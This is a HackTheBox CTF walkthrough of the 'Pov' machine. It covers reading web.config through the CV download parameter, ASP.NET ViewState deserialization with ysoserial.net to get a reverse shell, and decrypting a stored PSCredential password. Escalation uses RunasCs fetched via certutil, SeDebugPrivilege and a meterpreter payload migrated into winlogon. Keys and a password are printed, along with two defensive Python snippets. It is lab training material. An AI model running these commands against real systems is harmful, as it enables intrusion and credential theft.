Welcome to this HackTheBox CTF Walkthrough! In today’s walkthrough, we will be solving the Pov machine, step by step. The difficulty of this CTF is medium. Let’s get started and hack our way to root this box!
Before You Start!!
- Connect to HackTheBox using OpenVPN.
- Add “IP pov.htb” to your /etc/hosts file.
Scanning
Let’s start by scanning the target IP with an nmap fast scan (-F only probes the 100 most common ports):
nmap -F 10.10.11.251
Result
We got only one open port: 80.
Accessing & Enumerating Port 80
Browsing to port 80 gives us a web page.
Before doing anything else, I started subdomain enumeration with gobuster and directory enumeration with dirb.
For SubDomain Enumeration
command
gobuster vhost -u http://pov.htb/ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 40 | tee gobuster-subdomainEnum.txt
Result
We found one subdomain: dev.pov.htb. Add it to the /etc/hosts entry alongside pov.htb.
For Directory Enumeration
command:
dirb http://pov.htb
Nothing interesting was found here.
Finding Web Technologies Using Wappalyzer
I tried more enumeration too, such as checking the robots.txt file and the page source, but found nothing interesting on this domain.
Let’s move on to the dev.pov.htb subdomain we found earlier.
Accessing http://dev.pov.htb redirects us to /portfolio/default.aspx.
I started enumerating this subdomain too.
Web Technologies Using Wappalyzer
Directory & File Enumeration
After enumeration I found a download button for downloading a CV.
In Burp, the download request looks like this.
After this I searched for IIS exploitation techniques and found a HackTricks page.
I tried requesting /web.config by replacing cv.pdf in the request, and found something interesting.
The response contains configuration details, including the machineKey decryption key and validation key.
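The defensive lesson from this step is that the download endpoint served whatever file name it was handed, not just the CV. As an added example (Python, not the box’s ASP.NET code; the download directory and the .pdf allow-list are assumptions), here is a resolver that only ever returns a bare, allow-listed file name under the download directory and refuses requests like /web.config or ../web.config:

```python
from pathlib import Path, PurePosixPath
from typing import Optional

# Constructed values: where CVs live and which file types the endpoint may return.
DOWNLOAD_ROOT = Path("/var/www/portfolio/downloads")
ALLOWED_SUFFIXES = {".pdf"}


def resolve_download(requested: str, root: Path = DOWNLOAD_ROOT) -> Optional[Path]:
    """Map a user-supplied file name to a path under root, or None if it must be refused.

    `requested` is assumed to be already URL-decoded by the web framework.
    """
    # Treat Windows separators like POSIX ones so "..\\web.config" is not special.
    cleaned = requested.replace("\\", "/")
    # Refuse empty names and dotfiles (".", "..", ".htaccess", ...).
    if not cleaned or cleaned.startswith("."):
        return None
    # A legitimate request is a bare file name: any directory part, whether
    # relative ("../web.config") or absolute ("/web.config"), is rejected outright.
    if cleaned != PurePosixPath(cleaned).name:
        return None
    # Only allow-listed file types; "web.config" fails here even as a bare name.
    if PurePosixPath(cleaned).suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    candidate = (root / cleaned).resolve()
    # Defence in depth: after symlink resolution the file must still sit under root.
    if root.resolve() not in candidate.parents:
        return None
    return candidate
```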
Gaining Shell
After some research I found a blog post explaining how these configuration details can be used to exploit ViewState deserialization: https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
I booted up my Windows machine and downloaded the ysoserial.exe binary from the Ysoserial.net GitHub repo.
Using the validation key and decryption key, I created a payload that runs a reverse shell.
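The leaked keys are what make this possible: whoever holds validationKey and decryptionKey can sign and encrypt ViewState the server will accept. As an added example (Python, not from the page or from ysoserial.net; the two sample web.config documents are constructed and their key values are placeholders), here is a small audit that flags a machineKey configuration like the one leaked here and passes a hardened one:

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the <machineKey> element leaked from this box;
# the key values are placeholders, not the box's real keys.
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" validationKey="PLACEHOLDER_VALIDATION_KEY" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Auto" />
  </system.web>
</configuration>
"""

# Constructed hardened counterpart: per-server auto-generated keys and HMACSHA256 MAC.
SAFE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" validationKey="AutoGenerate,IsolateApps" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>
"""

STRONG_VALIDATION = {"HMACSHA256", "HMACSHA384", "HMACSHA512"}


def audit_web_config(xml_text: str) -> list[str]:
    """Return findings that make ViewState forgery easier; an empty list means nothing was flagged."""
    findings = []
    root = ET.fromstring(xml_text)
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        for attr in ("validationKey", "decryptionKey"):
            # Static keys are sometimes required (web farms) but must then be
            # unreadable from the web and rotated if the file was ever exposed.
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"static {attr}: anyone who reads web.config can forge ViewState")
        # "HMACSHA256" is the .NET Framework 4.x default when the attribute is absent.
        validation = mk.get("validation", "HMACSHA256").upper()
        if validation not in STRONG_VALIDATION:
            findings.append(f"validation={validation}: use HMACSHA256 or stronger")
    pages = root.find("./system.web/pages")
    if pages is not None:
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("enableViewStateMac=false: ViewState is not integrity-checked")
        if pages.get("viewStateEncryptionMode", "Auto") == "Never":
            findings.append("viewStateEncryptionMode=Never: ViewState contents are readable")
    return findings
```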
For Creating Reverse Shell For PowerShell
I am using Online — Reverse Shell Generator to generate the reverse shell.
Then I started a netcat listener on port 1234, copied the reverse shell, went to the Windows box and generated the payload with ysoserial.exe.
Command For Generating Payload
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "Reverse_Shell_Here" --path="/portfolio/default.aspx" --approach="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
Once you have the payload, copy it, click the Download CV button again while intercepting in Burp, replace the value of the “__VIEWSTATE” parameter with the generated payload and send the request.
If everything has been set up properly, you should see a successful connection.
Finding User.txt
After gaining a shell I went straight to C:\Users\sfitz\Desktop, but didn’t find anything there. Enumerating further, I found a file named connection.xml inside \Documents.
Here the Password field holds an encrypted string. I searched for System.Management.Automation.PSCredential on Google and found this page: https://systemweakness.com/powershell-credentials-for-pentesters-securestring-pscredentials-787263abf9d8
Command I Use:
$user = "alaading"
# The Password value in connection.xml is a DPAPI-protected SecureString written by Export-Clixml;
# ConvertTo-SecureString with no -Key decrypts it, but only as the same Windows user on the same machine that created it.
$pass = "Password_String_Here" | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)
# GetNetworkCredential() exposes the plaintext password
$cred.GetNetworkCredential() | fl
And we got password!!
I tried getting access as this user with evil-winrm, but it didn’t work, so I decided to use RunasCs.exe, which is used for privilege escalation in Windows environments. It allows you to execute commands or run applications with the credentials of another user, typically one with higher privileges such as a system or administrator account. You can download the RunasCs.exe binary from: https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
After downloading and unzipping you’ll get RunasCs.exe. Using a python3 HTTP server and certutil, I uploaded this binary to the target machine.
For Running Python Server
python3 -m http.server
For Downloading
certutil.exe -urlcache -f http://10.10.16.23:8000/RunasCs.exe RunasCs.exe
Before running it I started a netcat listener on a different port, and with the command below I got a shell as the alaading user.
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.16.23:2345
Now you know where you can find user.txt :)
Finding Root.txt
I ran “whoami /priv” to list the privileges assigned to the currently logged-in user.
We can see SeDebugPrivilege, but it is Disabled.
If you don’t know about SeDebugPrivilege, you can simply search on Google for its privilege escalation tactics.
To enable it, we download the following scripts to our local system:
Then upload them to the alaading user’s session using certutil.
Run these scripts and check the privileges again.
Now let’s find the PID of a privileged process.
So, if we migrate into the winlogon process, we will run as SYSTEM.
Create meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=3456 -f exe -o payload.exe
Upload payload.exe to the alaading user’s session, and before running it start msfconsole and set up the listener.
Now run payload.exe and it’ll give us a meterpreter shell.
After gaining the meterpreter session, migrate to the winlogon PID.
BOOMM!! WE SOLVED POV BOX SUCCESSFULLY